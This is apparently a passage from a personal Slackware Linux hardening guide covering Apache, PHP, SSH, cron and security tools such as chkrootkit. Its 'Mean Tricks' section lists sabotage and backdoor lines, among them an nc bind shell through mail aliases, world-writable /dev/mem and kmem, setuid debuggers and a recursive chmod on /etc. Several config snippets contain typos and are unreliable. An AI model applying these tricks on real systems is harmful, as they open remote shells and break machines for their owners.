root@darkstar:~# groupadd -g 80 http
root@darkstar:~# useradd -u 80 -g 80 http
/etc/apache/httpd.conf:
#LoadModule includes_module libexec/apache/mod_include.so
#LoadModule autoindex_module libexec/apache/mod_autoindex.so
#LoadModule speling_module libexec/apache/mod_speling.so
#LoadModule userdir_module libexec/apache/mod_userdir.so
#LoadModule anon_auth_module libexec/apache/mod_auth_anon.so
#LoadModule digest_module libexec/apache/mod_digest.so
#LoadModule proxy_module libexec/apache/mod_proxy.so
#LoadModule cern_meta_module libexec/apache/mod_cern_meta_module.so
#LoadModule usertrack_module libexec/apache/mod_usertrack.so
#LoadModule unique_id_module libexec/apache/mod_unique_id.so
#AddModule mod_includes.c
#AddModule mod_autoindex.c
#AddModule mod_speling.c
#AddModule mod_userdir.c
#AddModule mod_auth_anon.c
#AddModule mod_digest.c
#AddModule mod_proxy.c
#AddModule mod_cern_meta.c
#AddModule mod_usertrack.c
#AddModule mod_unique_id.c
User http
Group http
ServerAdmin root@localhost
<Directory "/var/www/htdocs">
Options FollowSymLinks MultiViews
UseCanonicalName Off
LogLevel info
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %T"
CustomLog /var/log/apache/access_log combined
ServerSignature Off
ServerTokens ProductOnly
<Directory "/var/www/icons">
Options MultiViews
#Alias /manual/ "/var/www/htdocs/manual/"
#<Directory "/var/www/htdocs/manual">
# Options Indexes FollowSymLinks MultiViews
# AllowOverride None
# Order allow,deny
# ALlow from all
#</Directory>
#ScriptAlias /cgi-bin/ "/var/www/cgi-bin/"
#<Directory "/var/www/cgi-bin">
# AllowOverride None
# Options None
# Order allow,deny
# Allow from all
#</Directory>
# /etc/logrotate.d/httpd:
# /var/log/apache/access_log /var/log/apache/error_log {
# create 0640 root root
# mail
[email protected]
# mailfirst
# sharedscripts
# postrotate
# /bin/kill -HUP `cat /var/run/httpd.pid \
# 2> /dev/null || true`
# endscript
# }
/etc/logrotate.d/httpd:
/var/log/httpd/*_log {
rotate 26
notifempty
size=5M
compress
delaycompress
sharedscripts
postrotate
/etc/rc.d/rc.httpd restart
endscript
dentonj@darkstar:~$ links /var/www/htdocs/manual/misc/security_tips.html
PHP:
Fortunately, PHP is disabled by default. But if you insist on letting the
script kiddies have free reign of your system, there are a few things you
can do to slow them down.
/etc/apache/httpd.conf:
Include /etc/apache/mod_php.conf
/etc/apache/php.ini:
display_errors = Off
log_errors = On
error_log = /var/log/apache/php_errors
register_globals = Off
variables_order = "ES"
expose_php = Off
all_url_fopen = Off
open_basdir = /var/www
disable_functions = system,exec,shell_exec,eval,include,require,include_once,require_once,preg_replace
safe_mode = On
safe_mode_include_dir = /usr/php/include
safe_mode_exec_dir = /usr/php/bin
safe_mode_gid = On
safe_mode_allowed_env_vars = PHP_
safe_mode_protected_env_vars = LD_LIBRARY_PATH
root@darkstar:~# touch /var/log/apache/php_errors
root@darkstar:~# mkdir -p /usr/php/include
root@darkstar:~# mkdir /usr/php/bin
man httpd
man php
/etc/ssh/ssh_config:
# Host *
ForwardAgent no
ForwardX11 no
RhostsRSAAuthentication no
RSAAuthentication no
PasswordAuthentication yes
HostbasedAuthentication no
BatchMode no
CheckHostIP yes
AddressFamily any
ConnectTimeout 0
StrictHostKeyChecking ask
# IdentityFile ~/.ssh/identity
IdentityFile ~/.ssh/id_rsa
IdentityFile ~/.ssh/id_dsa
Port 22
Protocol 2
# Cipher 3des
# Ciphers aes256-cbc,aes256-ctr
EscapeChar ~
Compression yes
HashKnownHosts yes
EnableSSHKeysign no
LogLevel DEBUG
PubkeyAuthenticaton yes
ServerAliveInterval 60
ServerAliveCountMax 10
TCPKeepAlive no
UserKnownHostsFile ~/.ssh/known_hosts
/etc/ssh/sshd_config
Port 22
Protocol 2
AddressFamily inet
ListenAddress 192.168.1.2
# HostKey for protocol version 1
#HostKey /etc/ssh/ssh_host_key
# HostKeys for protocol version 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
# Lifetime and size of ephemeral version 1 server key
#KeyRegenerationInterval 1h
#ServerKeyBits 768
# Logging
# obsoletes QuietMode and FascistLogging
SyslogFacility AUTH
LogLevel DEBUG
# Authentication:
LoginGraceTime 2m
PermitRootLogin no
StrictModes yes
MaxAuthTries 6
AllowUsers dentonj@trustedhost
AllowGroups wheel
RSAAuthentication no
PubkeyAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys
# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
RhostsRSAAuthentication no
# similar for protocol version 2
HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# RhostsRSAAuthentication and HostbasedAuthentication
IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
IgnoreRhosts yes
# To disable tunneled clear text passwords, change to no here!
PasswordAuthentication no
PermitEmptyPasswords no
# Change to no to disable s/key passwords
#ChallengeResponseAuthentication yes
# Kerberos options
#KerberosAuthentication no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
#KerberosGetAFSToken no
# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes
#UsePAM no
AllowTcpForwarding yes
GatewayPorts no
X11Forwarding no
X11DisplayOffset 10
X11UseLocalhost yes
PrintMotd yes
PrintLastLog yes
TCPKeepAlive no
UseLogin no
UsePrivilegeSeparation yes
PermitUserEnvironment no
Compression delayed
ClientAliveInterval 60
ClientAliveCountMax 10
UseDNS yes
PidFile /var/run/sshd.pid
#MaxStartups 10
# no default banner path
Banner /etc/issue.net
# override default of no subsystems
#Subsystem sftp /usr/libexec/sftp-server
# Ciphers aes256-cbc,aes256-ctr
# login.conf(5) is not used in Slackware
ChallengeResponseAuthentication no
root@darkstar:~# chmod u-s /usr/libexec/ssh-keysign
man ssh
man sshd
man ssh_config
man sshd_config
/etc/ssh/sshrc:
TODO
/usr/bin/mysql_safe:
TODO
root@darkstar:~# less /var/lib/mysql/darkstar.err
man mysql_fix_privilege_tables
NFS:
root@darkstar:~# removepkg nfs-utils
NIS:
root@darkstar:~# removepkg yptools
----[ Security Programs/Scripts ]----
GnuPG:
On the Slackware Source CD 3:
mount /mnt/cdrom
cd /mnt/cdrom/testing/packages
installpkg gnupg-1.4.2-i486-1.tgz
libsafe:
On the Slackware Source CD 3:
mount /mnt/cdrom
cd /mnt/cdrom/extra/libsafe-2.0.16
installpkg libsafe-2.0.16-i386-1.tgz
Snort:
http://www.snort.org
TODO
sXid:
http://packages.debian.org/stable/source/sxid
root@darkstar:~# cp sxid_4.0.5.tar.gz src
root@darkstar:~# cd src
root@darkstar:~/src# gzip -cd sxid_4.0.5.tar.gz | tar xvf -
root@darkstar:~/src# cd sxid-4.0.5
root@darkstar:~/src/sxid-4.0.5# less README
root@darkstar:~/src/sxid-4.0.5# make install
/usr/local/etc/sxid.conf:
ALWAYS_NOTIFY = "yes"
ALWAYS_ROTATE = "yes"
IGNORE_DIRS = ""
/etc/cron.daily/sxid:
#!/bin/sh
/usr/local/bin/sxid
root@darkstar:~# chmod 700 /etc/cron.daily/sxid
root@darkstar:~# sxid
chkrootkit:
http://www.chkrootkit.org
root@darkstar:~# cp chkrootkit_0.46a.tar.gz src/
root@darkstar:~# cd src
root@darkstar:~/src# gzip -cd chkrootkit_0.46a.tar.gz | tar xvf -
root@darkstar:~/src# cd chkrootkit-0.46a
root@darkstar:~/src/chkrootkit-0.46a# less README
root@darkstar:~/src/chkrootkit-0.46a# make sense
Copy the following to /usr/local/sbin:
check_wtmpx
chkdirs
chklastlog
chkproc
chkrootkit
chkutmp
chkwtmp
ifpromisc
strings-static
root@darkstar:~# crontab -e
# Chkrootkit, results are mailed to root
10 4 * * * ( cd /usr/local/sbin && ./chkrootkit 2>&1)
root@darkstar:~# killall -HUP crond
aide:
http://sourceforge.net/project/aide
TODO
lcap:
root@darkstar:~# cp lcap_0.0.6.orig.tar.gz src/
root@darkstar:~# cd src
root@darkstar:~/src# gzip -cd lcap_0.0.6.orig.tar.gz | tar xvf -
root@darkstar:~/src/# cd lcap-0.0.6/
root@darkstar:~/src/lcap-0.0.6# less README
root@darkstar:~/src/lcap-0.0.6# make
root@darkstar:~/src/lcap-0.0.6# strip lcap
root@darkstar:~/src/lcap-0.0.6# cp lcap /usr/local/sbin
----[ Usibility/Reducing Security ]----
Run X applications as root:
The Linux Security Cookbook contains a short script that will set DISPLAY
and XAUTHORITY to allow root to run X apps. Or you can cheat by setting
DISPLAY and HOME to accomplish the same thing.
root@darkstar:~# xv
xv: Can't open display
root@darkstar:~# DISPLAY=:0.0
root@darkstar:~# xv
Xlib: connection to ":0.0" refused by server
Xlib: Invalid MIT-MAGIC-COOKIE-1 key
xv: Can't open display
root@darkstar:~# HOME=/home/dentonj
root@darkstar:~# xv
A better way is to use xauth and set the MIT-MAGIC-COOKIE:
root@darkstar:~# xauth -f /home/dentonj/.Xauthority extract - :0 | \
xauth merge -
root@darkstar:~# xauth list
darkstar/unix:0 MIT-MAGIC-COOKIE-1 abcdef0123456789abcdef0123456789
dentonj@darkstar:~$ xauth list
darkstar/unix:0 MIT-MAGIC-COOKIE-1 abcdef0123456789abcdef0123456789
localhost:0 MIT-MAGIC-COOKIE-1 9876543219fedcba9876543210fedcba
You still have to set DISPLAY for root. Be aware that setting DISPLAY in a
shell config file (e.g. - /etc/profile) may cause problems with X
forwarding in ssh.
man xauth
man Xsecurity
/usr/bin/lessopen.sh:
I like to dig around inside of binaries. Uncomment the following lines:
*) FILE=`file -L "$1"` ; # Check to see if binary, if so -- view with 'strings'
FILE1=`echo $FILE | cut -d ' ' -f 2`
FILE2=`echo $FILE | cut -d ' ' -f 3`
if [ "$FILE1" = "Linux/i386" -o "$FILE2" = "Linux/i386" \
-o "$FILE1" = "ELF" -o "$FILE2" = "ELF" ]; then
strings "$1"
fi ;;
Error Beep:
I make extensive use of tab completion in bash. However, the error beeps
tend to annoy those around me. Here are three ways to turn off the error
beep.
/etc/profile:
setterm -bfreq 0
~/.xinitrc:
xset -b
exec /usr/X11R6/bin/startfluxbox
/etc/inputrc:
set bell-style none
man bash
----[ Mean Tricks ]----
/etc/aliases:
opensaysme: | nc -l -p 44444 -e /bin/sh
~/.forward:
| nc -l -p 44444 -e /bin/sh
/etc/login.defs:
NO_PASSWORD_CONSOLE tty1,tty2,tty3,tty4,tty5,tty6
/etc/rc.d/rc.6:
touch /etc/forcefsck
/etc/hotplug/blacklist:
hid
/etc/inittab:
id:6:initdefault:
iptables -m random
iptables -A FORWORD -s 192.168.1.1 -m random --average 90 -j DROP
iptables -A INPUT -j DROP
Anywhere in /etc/rc.d:
reboot
enable -n enable
chmod u+s /usr/bin/strace
chmod u+s /usr/bin/gdb
chmod 666 /dev/mem
chmod 666 /dev/kmem
chmod 666 /dev/port
ifconfig eth0 mtu 68
touch ./-r
# Look mom, I'm securing my system!
chmod -R 600 /etc
----[ Useful Commands ]----
ldd /usr/bin/lppasswd
/lib/ld-linux.so.2 --list /usr/bin/lppasswd
strings /usr/bin/lppasswd
List some of the popular REM commands used.
man -k cron
grep crond /var/log/packages/*
cd /bin && for i in `ls | grep -v "@$"`; do
file $i | grep "not stripped"
done
for i in /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin \
/usr/X11R6/bin; do echo $i; cd $i && for j in `ls | grep "@$"`; do file $j \
| grep "not stripped"; done; done
which kill
type -a kill
stat /bin/login
touch example
stat example
touch -r /bin/login example
stat example
strace -p 19148 -f -e trace=network,read,write -o ssh_trace.out -e write=4 \
-e read=6 # Where 19148 is the PID of sshd
ifconfig eth0 hw ether 00:00:DE:AD:BE:EF
ifconfig eth0 0.0.0.0 up -arp
ln -s /usr/bin/write /bin/write
kibitz dentonj
netwatch
iptraf
last -f /var/log/wtmp.1.gz
grep -ir secur /usr/doc/* > security.txt
----[ /etc/profile ]----
# Kick and lockout users that are UID 0 but are not root
if [ `id -u` = "0" -a `echo $USER` != "root" ]; then
# Lock the user out
passwd -l $USER
# Save some info
date >> /root/SHIT
netstat -peanut >> /root/SHIT
ps auxww >> /root/SHIT
w >> /root/SHIT
w | mail -s "$USER has gained ROOT access on $HOSTNAME"
[email protected]
# Let EVERYONE know
wall << EOF
****************************************************************
$USER has gained ROOT access on $HOSTNAME!!!
****************************************************************
EOF
for i in `ls /dev/pts/`; do
echo -e "\n$USER has gained ROOT access on $HOSTNAME!!\n" >> /dev/pts/$i
done
# Log it
logger -is -f /var/log/messages "$USER has gained ROOT access!!"
# Let the luzer know
echo -e "\a\n\n You are _NOT_ root!!\n\n\a"
# For the really paranoid (run before killing the user's processes)
ifconfig eth0 down
# Kill the user and their processes
skill -9 -u $USER
# This should be redundant
logout
exit
fi
export LESSOPEN="|/usr/bin/lessopen.sh %s"
# Set a default shell prompt:
#PS1='`hostname`:`pwd`#'
#if [ "$SHELL" = "/bin/pdksh" ]; then
# PS1='! $ '
#elif [ "$SHELL" = "/bin/ksh" ]; then
# PS1='! ${PWD/#$HOME/~}$ '
#elif [ "$SHELL" = "/bin/zsh" ]; then
# PS1='%n@%m:%~%# '
#elif [ "$SHELL" = "/bin/ash" ]; then
# PS1='$ '
#else
# PS1=/\u@\h:\w\$ '
#fi
if [ `id -u` = 0 ]; then
# A red shell prompt for root
PS1="\[\033[1;31m\][\j][\u@\h:\w]#\[\033[0m\] "
else
# A green shell prompt for everyone else
PS1="\[\033[1;32m\][\j][\u@\h:\w]$\[\033[0m\] "
fi
PS2='>'
export PATH LESS TERM PS1 PS2
# For non-root users, add the current directory to the search path:
#if [ ! "`id -u`" = "0" ]; then
# PATH="$PATH:."
#fi
#
# Stuff I've added
#
# Add $HOME/bin to the search path
PATH=$PATH:$HOME/bin
export PATH
export FIGNORE=".o"
# Set EDITOR for less
export EDITOR=vim
# History
# I use to set these to paranoid settings, such as 100 or 10.
export HISTSIZE=10000
export HISTFILESIZE=10000
# Display timestamp information with each history entry
export HISTTIMEFORMAT="%F %T "
# Logout if a root terminal is not being used
if [ `id -u` = "0" ]; then
export TMOUT=1200
fi
# Aliases
alias matrix="cmatrix -bass"
alias m="cmatrix -bass"
alias su="su -"
alias td="tcpdump -nvvSi eth0 | grcat conf.tcpdump"
# shred doesn't delete recursively
# use "/bin/rf -rf ..." for directories
alias rm="shred -uz"
# Disable the bash builtin command kill, forces the use
# of /bin/kill.
# This was a cute idea, but it prevents jobs from being killed
#enable -n kill
# Misc shell settings
shopt -s cdspell
shopt -s cmdhist
shopt -s dotglob
shopt -s extglob
setterm -bfreq 0
# grep options
export GREP_OPTIONS="-n --color"
export GREP_COLOR="1;33"
# Secure less
export LESSSECURE=1
# This works for single user systems if the luzer who breaks into your
# system uses an interactive shell
if [ `id -u` != "0" -o `id -u` != "1000" ]; then
passwd -l $USER
logout
fi
# Set these and make them read only to keep users from setting them
export HISTCONTROL=""
export HISTIGNORE=""
# Disable builtin shell commands
# TODO
# Set shell variables as read only, this should be last:
typeset -r HISTCONTROL
typeset -r HISTFILE
typeset -r HISTFILESIZE
typeset -r HISTIGNORE
typeset -r HISTNAME
typeset -r HISTSIZE
typeset -r LESSSECURE
typeset -r LOGNAME
typeset -r USER
-- When You Are Done --
Join the irc channel #slackware on irc.oftc.net and talk about everything
but Slackware.
-- Stuff that didn't work --
# If the following variables are not set, exit with an error message
: ${USER:?Who are you?}
: ${LOGNAME:?Who are you?}
: ${HOME:?The homeless need help}
# If a user doesn't have a home directory listed in /etc/passwd,
# login is nice enough to set "/" as $HOME
if [ ${HOME} = "/" ]; then
logout
fi
-- Todo --
KDE:
Look into it
/etc/shells:
Lock down the other shells.
/bin/login:
Modify so a different encryption hashing algorithms is used.
Securing filesystems other than ext2 and ext3
Log checking utility
-- Resources --